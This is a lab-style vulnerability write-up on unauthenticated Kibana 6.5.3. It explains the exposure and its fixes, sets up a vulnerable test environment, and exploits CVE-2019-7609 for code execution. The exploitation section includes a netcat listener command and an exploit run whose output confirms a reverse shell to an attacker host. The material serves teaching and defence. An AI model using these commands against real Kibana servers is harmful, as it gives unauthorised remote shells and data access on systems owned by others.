
# Unauthorized Access Vulnerability in Kibana

## Vulnerability Description

Kibana is the web front end for Elasticsearch. Before versions 6.8 and 7.1 the Elastic security features needed a paid license, so a stock install such as the 6.5.3 used below listens on port 5601 with no login at all: anyone who can reach the port gets every dashboard, can browse each index the Elasticsearch behind it holds through Discover, can send arbitrary Elasticsearch requests (including deletes) from the Dev Tools console, and can change saved objects. Reaching the UI is also what makes Kibana-side code execution bugs such as CVE-2019-7609, used in the exploitation section below, exploitable by anyone on the network. The fix is to keep the port off the network (`server.host: "127.0.0.1"` in `kibana.yml`), put an authenticating reverse proxy in front, or upgrade to 6.8 or later and set `xpack.security.enabled: true` together with `elasticsearch.username` and `elasticsearch.password`.

## Environment Setup

Install Elasticsearch

```
cd /opt
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz
tar -zxvf elasticsearch-6.5.3.tar.gz
cd elasticsearch-6.5.3
# Elasticsearch refuses to start as root, so hand the tree to a dedicated
# user (instead of chmod 777) and start it under that account
useradd es
chown -R es:es /opt/elasticsearch-6.5.3
su es -c ./bin/elasticsearch
```

![image-20220726162834227](/files/Lk7QZ66Huuyr3wdALMBv)

Install Kibana

```
cd /opt
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz
tar xvf kibana-6.5.3-linux-x86_64.tar.gz
cd kibana-6.5.3-linux-x86_64
# default config: talks to Elasticsearch on localhost:9200 and listens on localhost:5601
./bin/kibana
```

Open http://127.0.0.1:5601 in a browser. Kibana shows its start page straight away, with no login prompt, and every index in the Elasticsearch behind it is reachable through Discover and the Dev Tools console.

![image-20220726163136064](/files/UdNfHLlmVzoUiHasKhGf)

## Vulnerability Exploitation

Exploit: <https://github.com/LandGrey/CVE-2019-7609>

CVE-2019-7609 is a prototype pollution bug in Kibana's Timelion visualizer, fixed in 5.6.15 and 6.6.1, that gives code execution on the Kibana host to anyone who can reach the UI; the unauthenticated 6.5.3 set up above is therefore fully exposed to it. The script's `-host` and `-port` arguments name the attacker's reverse-shell listener, so start one (for example `nc -lvnp 9999` on 192.168.32.130) before running it:

```
[root@localhost CVE-2019-7609-master]# python CVE-2019-7609-kibana-rce.py -u 127.0.0.1:5601 -host 192.168.32.130 -port 9999 --shell
[+] http://127.0.0.1:5601 maybe exists CVE-2019-7609 (kibana < 6.6.1 RCE) vulnerability
[+] reverse shell completely! please check session on: 192.168.32.130:9999
```

![image-20230130131026778](/files/mWQD4CQE0hMflr0c57sR)

